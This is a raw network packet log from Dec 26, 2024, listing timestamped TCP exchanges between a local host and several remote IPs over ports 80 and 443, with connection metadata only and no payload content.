Dec 26, 2024 13:01:59.683293104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.683332920 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.683795929 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.684243917 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.684665918 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.684709072 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.685326099 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.685374975 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.685534954 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.685946941 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.686059952 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.686446905 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.686907053 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.686955929 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.687345028 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.687443972 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.687485933 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.688380003 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.688524961 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.688592911 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.689151049 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.689312935 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.689352989 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.690051079 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.690366030 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.690517902 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.690954924 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.691109896 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.691160917 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.691837072 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.692034960 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.692081928 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.692764997 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.693371058 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.693438053 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.693603992 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.693624020 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.693660021 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.694552898 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.694703102 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.694767952 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.695394039 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.695564985 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.695635080 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.696309090 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.696732044 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.696773052 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.697225094 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.697237968 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.697302103 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.698115110 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.698405027 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.698458910 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.698971987 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.699096918 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.699173927 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.699956894 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.700046062 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.700262070 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.700751066 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.701088905 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.701142073 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.701664925 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.701921940 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.701956034 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.702601910 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.703227997 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.703277111 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.703438997 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.703469992 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.703557968 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.704359055 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.704715014 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.704746008 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.705245018 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.705436945 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.705596924 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.706161022 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.706248999 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.706290007 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.707043886 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.708017111 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.708030939 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.708043098 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.708065033 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.708215952 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.708856106 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.708945036 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.709023952 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.709855080 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.710088015 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.710180998 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.710727930 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.711055994 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.711226940 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.711631060 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.711992979 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.712028980 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.712483883 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.712728977 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.712810040 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.713357925 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.713571072 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.713658094 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.714205980 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.714370966 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.714435101 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.715130091 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.715616941 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.715675116 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.716063023 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.716075897 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.716177940 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.716872931 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.762335062 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.881638050 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.881778002 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.881829977 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.881978989 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.882042885 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.882085085 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.882823944 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.883169889 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.883332968 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.883738041 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.883986950 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.884061098 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.884865999 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.884953976 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.885036945 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.885803938 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.885929108 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.885968924 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.886528969 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.886989117 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.887029886 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.887406111 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.887729883 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.887913942 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.888257027 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.888401985 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.888477087 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.889134884 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.889411926 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.889978886 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.890048981 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.890328884 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.890381098 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.890922070 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.891000986 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.891352892 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.891871929 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.891926050 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.891972065 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.892743111 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.892755032 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.892937899 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.893573999 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.893770933 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.893846035 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.894490004 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.895417929 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.895430088 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.895442009 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.895667076 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.895667076 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.896389008 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.896470070 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.896545887 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.897134066 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.897422075 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.897968054 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.898232937 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.898309946 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.898350000 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.899027109 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.899331093 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.899835110 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.899931908 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.900755882 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.901021957 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.901062965 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.901062965 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.901062965 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.901664972 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.901845932 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.901906967 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.902576923 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.903006077 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.903072119 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.903439045 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.903666973 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.904200077 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.904361963 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.904454947 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.904692888 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.905215025 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.905433893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.905796051 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.906111956 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.906214952 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.906280041 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.907006979 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.907187939 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.907255888 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.907939911 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.907963991 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.908014059 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.908792019 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.909236908 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.909349918 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.909732103 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.909862995 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.909965038 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.910593033 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.911499977 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.911511898 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.911525965 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.911632061 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.911632061 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.912467957 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.912771940 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.912906885 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.913362026 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.913451910 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.913613081 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.914177895 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.915072918 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.915086985 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.915108919 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.915116072 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.915148020 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.915982962 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.916660070 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.916718006 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.916812897 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.916896105 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.916937113 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.917818069 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.917834044 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.917896986 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.918657064 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.918804884 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.918909073 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.919539928 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.919874907 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.919951916 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.920454025 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.920758963 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.920802116 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.921341896 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.921428919 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.921472073 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.922216892 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.922708035 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.922807932 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.923119068 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.923549891 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.923593044 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.924000025 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.924164057 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.924201965 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.924916029 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.925065994 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.925127029 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.925781012 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.926100016 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.926155090 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.926681995 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.926839113 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.926912069 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.927604914 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.927745104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.927783966 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:59.928420067 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:59.981270075 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:02:00.101583004 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:02:00.101923943 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:02:00.101943970 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:02:00.101958990 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:02:00.102106094 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:02:00.102106094 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:02:00.103118896 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:02:00.104007006 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:02:00.104114056 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:02:11.305171967 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:11.305227995 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:11.305416107 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:11.339077950 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:11.339097977 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:11.468552113 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:02:13.124278069 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:13.126287937 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:13.126318932 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:13.127291918 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:13.127365112 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:13.131444931 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:13.131526947 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:13.269486904 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:13.269520044 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:13.472913027 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:14.632536888 CET	49703	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:14.632666111 CET	49703	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:14.633817911 CET	49811	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:14.633858919 CET	443	49811	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:14.633946896 CET	49811	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:14.634552002 CET	49811	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:14.634563923 CET	443	49811	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:14.752424955 CET	443	49703	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:14.752460003 CET	443	49703	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:16.077339888 CET	443	49811	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:16.077486992 CET	49811	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:22.796602964 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:22.796672106 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:22.796806097 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:23.104547024 CET	49795	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:02:23.104571104 CET	443	49795	142.250.181.68	192.168.2.5
Dec 26, 2024 13:02:35.466941118 CET	443	49811	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:35.467014074 CET	49811	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:42.194011927 CET	49811	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:42.194053888 CET	443	49811	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:42.194091082 CET	49811	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:42.194099903 CET	443	49811	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:42.194534063 CET	49913	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:42.194581032 CET	443	49913	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:42.194649935 CET	49913	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:42.194966078 CET	49913	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:02:42.195017099 CET	443	49913	23.1.237.91	192.168.2.5
Dec 26, 2024 13:02:42.195091963 CET	49913	443	192.168.2.5	23.1.237.91
Dec 26, 2024 13:03:11.208507061 CET	49979	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:03:11.208622932 CET	443	49979	142.250.181.68	192.168.2.5
Dec 26, 2024 13:03:11.208713055 CET	49979	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:03:11.208956003 CET	49979	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:03:11.208969116 CET	443	49979	142.250.181.68	192.168.2.5
Dec 26, 2024 13:03:12.989562035 CET	443	49979	142.250.181.68	192.168.2.5
Dec 26, 2024 13:03:12.989907026 CET	49979	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:03:12.989947081 CET	443	49979	142.250.181.68	192.168.2.5
Dec 26, 2024 13:03:12.990291119 CET	443	49979	142.250.181.68	192.168.2.5
Dec 26, 2024 13:03:12.990598917 CET	49979	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:03:12.990673065 CET	443	49979	142.250.181.68	192.168.2.5
